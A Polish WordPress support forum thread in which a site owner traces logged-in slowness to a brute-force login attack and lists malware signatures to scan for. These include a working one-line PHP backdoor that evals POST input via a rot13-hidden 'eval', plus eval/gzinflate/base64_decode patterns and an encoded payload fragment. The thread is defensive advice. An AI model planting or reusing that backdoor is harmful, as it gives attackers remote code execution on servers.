Wsparcie » Używanie i konfiguracja WordPressa » Strona i panel admina muli po zalogowaniu – śmiga dla niezalogowanych

  • Moja strona śmiga błyskawicznie dla użytkowników NIEZALOGOWANYCH, ale dla zalogowanych działa tak powoli, zarówno panel admina jak i zwykłe strony. Wczytanie strony, dodanie nowego wpisu czy komentarza trwa od 8 sekund aż do komunikatu Error 504 (przekroczenie 60 sekund na odświeżenie w przeglądarce).

    Zoptymalizowałem bazę danych wtyczką wp-sweep, strona trochę przyspieszyła, ale problem wciąż pozostaje.

    Ktoś wie, co można z tym zrobić? Według wtyczki monitorującej najdłużej wykonujący się skrypt na stronie i w panelu admina to ten:
    wp-includes/query.php:3603
    kilka innych w panelu admina też zamula.

    Wprowadziłem na próbę poprawki – usunąłem pod linijka 3603 dwie komendy i strona przyspieszyła, ale tylko mi – adminowi – za to logując się ze zwykłego konta zamuliło jeszcze bardziej.

    Co zrobić, by strona śmigała. A może ktoś z Was wie, jak można jeszcze zoptymalizować WordPressa?

    Problemem nie jest sam serwer, który ma bardzo dobre parametry, wygląda to tak, jakby albo jakieś komendy długo się wykonują z winy WordPressu, albo nie cachuje się strona dla osób zalogowanych.

Viewing 2 replies - 1 through 2 (of 2 total)
  • Thread Starter wolnemedia

    (@wolnemedia)

    Do tego trzeba jeszcze dodać, że sam zapis nowych komentarzy do bazy danych dla niezalogowanych trwa ułamek sekundy, a dla zalogowanych od 5 do 30 sekund. Podobnie jest z dodawaniem nowych wpisów na portalu. Ciekaw jestem, jak ten problem został rozwiązany przez adminów tego forum, bo widzę, że zapisywanie działa dla zalogowanych ekspresowo.

    Thread Starter wolnemedia

    (@wolnemedia)

    Sprawa została wyjaśniona.

    Problem, który obserwują osoby zalogowane na moim portalu, związany z muleniem strony (czyli powolnym działaniem) wywołany jest atakiem brute-force. Atak na portal WM został potwierdzony dzięki wtyczce sucuri monitorującej podobne działania.

    Atak polega na próbach masowego logowania się, atakom nie są w stanie zapobiec wtyczki captcha.

    Jeśli używacie WordPressu, powinniście zainstalować wtyczkę „Sucuri Security – Auditing, Malware Scanner and Hardening” oraz przeskanować serwer w poszukiwaniu kodów:

    ?php ($www= $_POST[‚bat’]) && @preg_replace(‚/ad/e’,’@’.str_rot13(‚riny’).'($www)’, ‚add’);?

    eval(”
    „gzinflate(”
    „base64_decode(”

    jeśli tymi metodami jest coś zakodowane to według naszego źródła informacji powinno to wyglądać mniej więcej tak:
    1X39e9q40ujP3efZ/0H1yVnDlhAgTbcJJWm+
    Q5omachX0+
    RyjDHgYrDXhpC0p//7nRlJtvwBId3d9753z3MaLI1Go9HXaDQz2lh/t+
    H1vF9/Wfr9919/Yb+
    zq8YJq/BfVos1epbjsNYjc89amLj06y//WjDGo17TM4KA1Zj2ZtlY7ZQs449Wa/VtaaX0x+
    qb1pvXq9bblddvy29fr2jVX39ZMF3H9RH6X+
    0OT2lbHWPsjJqGObLdIWTpe7ZjBR+
    NoQ7Z7yHbHlo5vbF7tNc83Tw/0Aus2dyrH+
    02m3kAwP/ZnRwLRr7nBrmFZmP37HL37It+

    Na moim portalu atak raz się nasila, innym razem opada, dlatego strona po zalogowaniu może działać raz szybciej a innym razem wolniej. Nie wiadomo, czy hakerzy przełamali blokadę WM czy nie. Będzie to sprawdzane.

    W ubiegłą sobotę zarejestrowano tylko 208 prób logowań do WM (tego dnia strona chodziła błyskawicznie), wczoraj 1543, dzisiaj do 19:00 aż 3794. Ale to niewiele w porównaniu z atakiem z 30 marca i 1 kwietnia. 30 marca było 459 359 prób logowań, a 1 kwietnia 250 667.

    Nie wiadomo, kiedy uda się rozwiązać problem, ale sam fakt, że atakowane są strony oparte na WordPressie, powinien zostać nagłośniony, by osoby odpowiedzialne za bezpieczeństwo WordPressu dokonały stosownych poprawek zapobiegającym atakom.

Viewing 2 replies - 1 through 2 (of 2 total)
  • Temat ‘Strona i panel admina muli po zalogowaniu – śmiga dla niezalogowanych’ jest zamknięty na nowe odpowiedzi.